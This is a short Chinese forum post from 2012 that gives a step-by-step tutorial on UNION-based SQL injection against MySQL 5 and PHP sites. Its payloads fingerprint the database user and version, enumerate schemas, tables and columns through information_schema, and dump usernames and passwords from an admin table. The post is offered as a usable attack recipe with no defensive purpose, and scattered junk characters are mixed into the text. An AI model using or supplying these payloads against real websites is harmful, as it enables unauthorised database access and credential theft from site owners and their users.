+ q- m- D, ~+ J1 E$ |/ M" P教程内容:Mysql 5+php 注入
" ]1 P5 p6 X( s" m: j6 o1 M& j& R$ X3 X* K6 R( `4 G6 }
1 U8 F$ G" |8 r, ^1 f9 o) M7 n: K5 o
一.查看MYSQL基本信息(库名,版本,用户)
4 }3 a) X8 K! x8 ]/ W7 ^) j) {4 c; C+ P5 o+ a+ B" b
and 1=2 union select 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8/*
8 H" a1 m! s. y# A# Q3 S" ^; i2 U- ^: Q* Z$ q2 b
二.查数据库
; G% x5 l& ]% _- \6 U) \ G, |$ {3 U+ O2 k6 R+ U A, f, E: j
and 1=2 union select 1,SCHEMA_NAME,3,4,5,6,7,8 from information_schema.SCHEMATA limit 1,1/*
% f$ R' f+ x' Y% u7 z Klimit 从0开始递增,查询到3时浏览器返回错误,说明存在2个库。1 U& H! }7 m3 G8 {3 z/ L
- g/ J0 e! d) O) T4 S5 q
三.暴表# ~ T' h/ `9 e; G# q; [ e
# H5 g1 U4 m/ l; |) S
and 1=2 union select 1,2,3,TABLE_NAME,5,6,7,8 from information_schema.TABLES where TABLE_SCHEMA =库的16进制编码 limit 1,1/*
# ]: |$ Q9 x. F& C% Y5 K( k; @, [$ @6 n4 ~! v+ ~. f6 k5 Z" J
limit 从0开始递增,查询到14时浏览器返回错误,说明此库存在13个表。. e' O) L5 _: N9 \) s
; ^' w: Z" D) q4 D0 D" g四.暴字段
( S4 x% ?8 O( B( x: w
# e9 x5 l b# [; q8 G8 b% T( pand 1=2 union select 1,2,3,COLUMN_NAME,4,5,6,7,8from information_schema.COLUMNS where TABLE_NAME=表的16进制编码 limit 1,1/*
/ }6 E. G$ F( u# v6 C4 A5 {0 y T) |' Q; z: P
limit 从0开始递增,查询到时浏览器返回错误,说明此表存在N-1个列。
8 D7 l! U+ N) v: F0 Y9 m/ q0 W6 @+ o6 e& ~. `
五.暴数据8 ~" ]( T9 d+ }) j! z9 S/ E1 s
6 H% m8 R3 ?# [and 1=2 union select 1,2,3,name,5,password,7,8 from web.ad_user/*
* r8 k2 A2 i! s- X9 @8 ~0 A, n( ^
8 k- R( x q3 m) u1 x: M2 {
这里直接暴明文的密码,大多时候我们遇到的是MD5加密之后的密文。
& a+ ~& }! W7 l8 r) ?/ L |
发表于 2012-9-13 16:27:53
收藏
支持
反对